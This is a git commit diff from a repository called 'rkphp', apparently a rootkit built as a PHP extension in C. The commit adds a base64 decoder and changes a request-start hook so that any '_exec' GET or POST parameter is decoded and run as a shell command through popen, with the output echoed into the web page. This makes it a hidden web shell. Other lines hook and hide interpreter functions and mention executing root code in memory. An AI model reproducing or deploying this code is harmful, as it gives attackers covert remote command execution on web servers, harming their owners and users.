Browse Source

Default

master
Root 5 years ago
parent
commit
d6c7b23a17
  1. 2
      rkphp/config.m4
  2. 2
      rkphp/include/common.h
  3. 10
      rkphp/include/utils.h
  4. 58
      rkphp/src/php_funcs.c
  5. 84
      rkphp/src/utils.c

2
rkphp/config.m4

@ -15,5 +15,5 @@ if test "$PHP_RKPHP" != "no"; then @@ -15,5 +15,5 @@ if test "$PHP_RKPHP" != "no"; then
fi
dnl Tell the build system about the extension and what files to use.
PHP_NEW_EXTENSION(rkphp, src/main.c src/php_funcs.c, $ext_shared)
PHP_NEW_EXTENSION(rkphp, src/main.c src/utils.c src/php_funcs.c, $ext_shared)
fi

2
rkphp/include/common.h

@ -1,6 +1,8 @@ @@ -1,6 +1,8 @@
#ifndef __RKPHP_COMMON_H
#define __RKPHP_COMMON_H
#include <stddef.h>
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif

10
rkphp/include/utils.h

@ -0,0 +1,10 @@ @@ -0,0 +1,10 @@
#ifndef __RKPHP_UTILS_H
#define __RKPHP_UTILS_H
#include <stddef.h>
// Returns the size of the output. If called with out = NULL, will just return
// the size of what the output would have been (without a terminating NULL).
size_t base64_decode(const char in[], char out[], size_t len);
#endif /* rkphp_utils.h */

58
rkphp/src/php_funcs.c

@ -3,8 +3,9 @@ @@ -3,8 +3,9 @@
#include <unistd.h>
#include "common.h"
#include "utils.h"
int rkphp_hook(
static int rkphp_hook(
const char *method_name,
void (*hook)(INTERNAL_FUNCTION_PARAMETERS),
void (**original)(INTERNAL_FUNCTION_PARAMETERS)
@ -29,8 +30,7 @@ int rkphp_hook( @@ -29,8 +30,7 @@ int rkphp_hook(
}
else
{
RKPHP_PRINTF("Unable to locate function '%s' in global function table.\n",
method_name);
RKPHP_PRINTF("Unable to locate function '%s' in global function table.\n", method_name);
return -1;
}
@ -80,9 +80,9 @@ static inline void n_extension_loaded(INTERNAL_FUNCTION_PARAMETERS) @@ -80,9 +80,9 @@ static inline void n_extension_loaded(INTERNAL_FUNCTION_PARAMETERS)
* Execute root code in memory. */
PHP_FUNCTION(rkphp_ex)
{
FILE *fp = NULL;
long pid, code, lstart, lend;
char line[2048], start[32], end[32], filename[PATH_MAX];
FILE *fp = NULL;
if(zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,
"ll", &pid, &code) == FAILURE)
@ -170,10 +170,54 @@ PHP_RINIT_FUNCTION(rkphp) @@ -170,10 +170,54 @@ PHP_RINIT_FUNCTION(rkphp)
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], *exec, *line;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s\n", output);
}
php_printf("</pre>\n");
pclose(fp);
}
}
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)))
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)))
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return FAILURE;
}
exec = Z_STRVAL_P(val);
if((fp = popen(exec, "r")) == NULL)
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return FAILURE;

84
rkphp/src/utils.c

@ -0,0 +1,84 @@ @@ -0,0 +1,84 @@
#include <stddef.h>
#include <stdlib.h>
#include "common.h"
#include "utils.h"
#define NEWLINE_INVL 76
static const char charset[] = { "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/" };
char revchar(char ch)
{
if(ch >= 'A' && ch <= 'Z')
ch -= 'A';
else if(ch >= 'a' && ch <='z')
ch = ch - 'a' + 26;
else if(ch >= '0' && ch <='9')
ch = ch - '0' + 52;
else if(ch == '+')
ch = 62;
else if(ch == '/')
ch = 63;
return ch;
}
size_t base64_decode(const char in[], char out[], size_t len)
{
char ch;
size_t idx, idx2, blks, blk_ceiling, left_over;
if(in[len - 1] == '=')
len--;
if(in[len - 1] == '=')
len--;
blks = len / 4;
left_over = len % 4;
if(out == NULL)
{
if(len >= 77 && in[NEWLINE_INVL] == '\n') // Verify that newlines where used.
len -= len / (NEWLINE_INVL + 1);
blks = len / 4;
left_over = len % 4;
idx = blks * 3;
if(left_over == 2)
idx ++;
else if(left_over == 3)
idx += 2;
}
else
{
blk_ceiling = blks * 4;
for(idx = 0, idx2 = 0; idx2 < blk_ceiling; idx += 3, idx2 += 4)
{
if(in[idx2] == '\n')
idx2++;
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
out[idx + 1] = (revchar(in[idx2 + 1]) << 4) | (revchar(in[idx2 + 2]) >> 2);
out[idx + 2] = (revchar(in[idx2 + 2]) << 6) | revchar(in[idx2 + 3]);
}
if(left_over == 2)
{
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
idx++;
}
else if(left_over == 3)
{
out[idx] = (revchar(in[idx2]) << 2) | ((revchar(in[idx2 + 1]) & 0x30) >> 4);
out[idx + 1] = (revchar(in[idx2 + 1]) << 4) | (revchar(in[idx2 + 2]) >> 2);
idx += 2;
}
}
return idx;
}
Loading…
Cancel
Save